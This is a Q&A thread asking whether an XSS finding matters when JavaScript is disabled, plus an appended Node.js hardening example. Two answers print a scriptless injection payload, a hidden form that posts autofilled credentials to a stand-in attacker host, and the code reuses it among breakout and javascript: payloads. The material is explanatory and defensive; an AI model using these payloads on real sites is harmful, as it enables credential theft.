I'm getting pretty frustrated trying to make McAfee whitelist a supposed exploit on a site I work on. The issue is that their automated system has detected a supposed XSS exploit, but the exploit only exists when JavaScript is disabled. Given the fact that you need JavaScript to be disabled for the exploit to exist, then surely this means this is not an exploit. Can anyone think of any possible arguments to the contrary?
Update - To add more detail:
The problem comes from one place where unsanitized URL content is written to an anchor tag href. So, with JS disabled you could have something like this:
<a href="foor.php?"><script>alert('foo')</script>#someanchor" ..
When JavaScript is enabled this href is updated to be this (on DOM ready):
<a href="javascript:;">link</a>
So, with JS enabled the link is no longer injected; with JS disabled, the alert would no longer execute.
asked Jun 4, 2010 at 11:13 by robjmills; edited Jun 6, 2010 at 17:52 by John Conde
Comments:
- Relying on JavaScript to fix XSS doesn't seem like the most solid plan to me....? – JAL, Jun 6, 2010 at 17:56
- Are you having a conversation with yourself? :P – alex, Nov 28, 2010 at 0:04
5 Answers
You need to change your page.
<a href="default_for_javascript_disabled" id="speciallink">link</a>
<script type="text/javascript">
var link = document.getElementById("speciallink");
link.href = "value_for_javascript_enabled";
</script>
If your site has a login form and the user has password autofill enabled, I might want to inject something like the following:
<form action="http://evil.hackademix/log" method="POST">
<div style="position: absolute; top: -5000px">
<input type="text" name="username">
<input type="password" name="password">
</div>
<input type="submit" value="pwn me"
style="opacity: 0; position: absolute; left: 0; top: 0; width: 100%; height: 100%;"
>
</form>
As soon as the user clicks anywhere on the page, his credentials get logged on my site :) It's not XSS in the strict sense (unless you consider HTML+CSS "scripting" lato sensu), but it is almost equally nefarious.
The only example I can think of that would exploit your page when JavaScript is disabled is when you rely too much on JavaScript.
Imagine the situation where you have some sort of clickable button, and you want to hide it from the user on page load / on tab change etc. using CSS changed by JavaScript.
In the normal situation you know a normal user won't be able to see this button because it's hidden, but if JavaScript is disabled all the content of the page will render straight away, displaying some 'hidden' features. (I'm writing the word hidden in quotes, because hiding stuff using CSS is a bad idea to start with, but again it all depends what sort of functionality our button has.)
Other example:
<a href="/nice/clean/url/" onclick="Update.Panel.Using(Ajax); return false;">Next Page</a>
As you can see, this time when JavaScript is disabled the user will be sent to the URL of the link and the update panel action won't be executed. Mostly you use this trick to send website crawlers to the correct page via the href attribute and treat users differently because JavaScript is on in their browsers, so you can do some 'cool stuff'.
I'm not sure if this correctly answers your question, but in general - just make sure the functionality is replicated / works the same way as it does when JavaScript is on.
I don't understand "When JavaScript is enabled this href is updated" bit.
If you do it on the server side, then it must be based on some prior detection, which can't be perfectly accurate. An attacker could probably fool the detection with CSRF (e.g. make the victim open example.com/?disabled_js=1 before being redirected to the XSS-vulnerable page).
If you're doing it on the client side, then it's already too late, as the injected HTML will be parsed before your script runs.
To answer your question — XSS is not possible when the user has JS disabled. However, there are other attacks, like phishing and CSRF, that HTML injection helps.
Oops, my HTML got lost in my previous answer. However, a malicious scriptless HTML injection may look like this:
<form action="http://evil.hackademix/log" method="POST">
<div style="position: absolute; top: -5000px">
<input type="text" name="username">
<input type="password" name="password">
</div>
<input type="submit" value="pwn me"
style="opacity: 0; position: absolute; left: 0; top: 0; width: 100%; height: 100%;"
>
</form>
Not to mention nice things you could do using or elements...
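The thread's fix is implied rather than shown: the question says unsanitized URL content is written into an anchor href, and the last two answers point out that a client-side rewrite runs after the browser has already parsed the injected markup, so the value has to be made safe on the server when the HTML is generated. The following Node.js snippet is an added example, not code from the question or from any of the answers. It puts the vulnerable concatenation beside two hardening steps: entity-encoding the attribute value, which stops the `">` breakout and the scriptless form injection quoted above, and an allowlist on the URL shape, which is what encoding alone cannot do against a `javascript:` value. The function names (`renderLinkUnsafe`, `renderLinkEscapedOnly`, `renderLinkSafe`, `isSafeHref`) and the accepted URL shapes are this example's own choices, and the payload strings are constructed from the ones quoted in the thread.

```javascript
// Added example (not from the original question or answers): server-side
// rendering of an <a href> built from untrusted URL input, showing the
// vulnerable pattern the question describes beside a hardened version.
// Function names and the allowlist below are assumptions of this example.

// Characters that must be entity-encoded inside a quoted HTML attribute
// (the same set is sufficient for text nodes).
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// 1. The vulnerable pattern from the question: the URL is concatenated raw.
//    A value containing "> closes the attribute and the tag, so whatever
//    follows (<script>, <form>, ...) becomes real markup, with or without JS.
function renderLinkUnsafe(href, text) {
  return `<a href="${href}">${text}</a>`;
}

// 2. Attribute encoding only. This stops the breakout, but a value such as
//    javascript:alert(1) contains no special characters and passes through
//    untouched: encoding cannot tell a dangerous scheme from a safe one.
function renderLinkEscapedOnly(href, text) {
  return `<a href="${escapeHtml(href)}">${escapeHtml(text)}</a>`;
}

// 3. Allowlist the URL shape first, then encode. Accepted shapes:
//    - absolute http(s) URLs,
//    - root-relative paths that do not start with // (a protocol-relative
//      URL would point the link at another host),
//    - relative paths, queries or fragments containing no colon, so no
//      scheme can be smuggled into the first segment.
//    Anything else is replaced by a fixed fallback.
const SAFE_HREF = /^(?:https?:\/\/[^\s"'<>]+|\/(?!\/)[^\s"'<>]*|[a-z0-9_.\-#?][^\s"'<>:]*)$/i;

function isSafeHref(href) {
  return SAFE_HREF.test(String(href));
}

function renderLinkSafe(href, text, fallback = '#') {
  const candidate = isSafeHref(href) ? href : fallback;
  // Encode after validation, so entity tricks such as &colon; stay literal
  // text in the attribute instead of being decoded into a real colon.
  return `<a href="${escapeHtml(candidate)}">${escapeHtml(text)}</a>`;
}

// Constructed payloads modelled on the ones quoted in the thread.
const PAYLOADS = {
  breakout: 'foor.php?"><script>alert(\'foo\')</script>#someanchor',
  scriptless: '"><form action="http://evil.hackademix/log" method="POST"><input name="password"></form><a href="',
  scheme: 'javascript:alert(document.cookie)',
  benign: 'foo.php?id=1&x=2#top',
};

// Render every payload through all three variants so they can be compared.
function demo() {
  const out = {};
  for (const [name, href] of Object.entries(PAYLOADS)) {
    out[name] = {
      unsafe: renderLinkUnsafe(href, 'link'),
      escaped: renderLinkEscapedOnly(href, 'link'),
      safe: renderLinkSafe(href, 'link'),
    };
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Run it with `node` and compare the three renderings of each payload: `unsafe` emits the injected `<script>` and `<form>` markup verbatim, `escaped` neutralises both but still emits the `javascript:` link unchanged, and only `safe` rejects the scheme while leaving the benign `foo.php?id=1&x=2#top` link intact (with `&` correctly encoded as `&amp;`). The allowlist is deliberately strict about colons; if the site needs `mailto:` or other schemes, add them as explicit alternatives rather than loosening the relative-path branch.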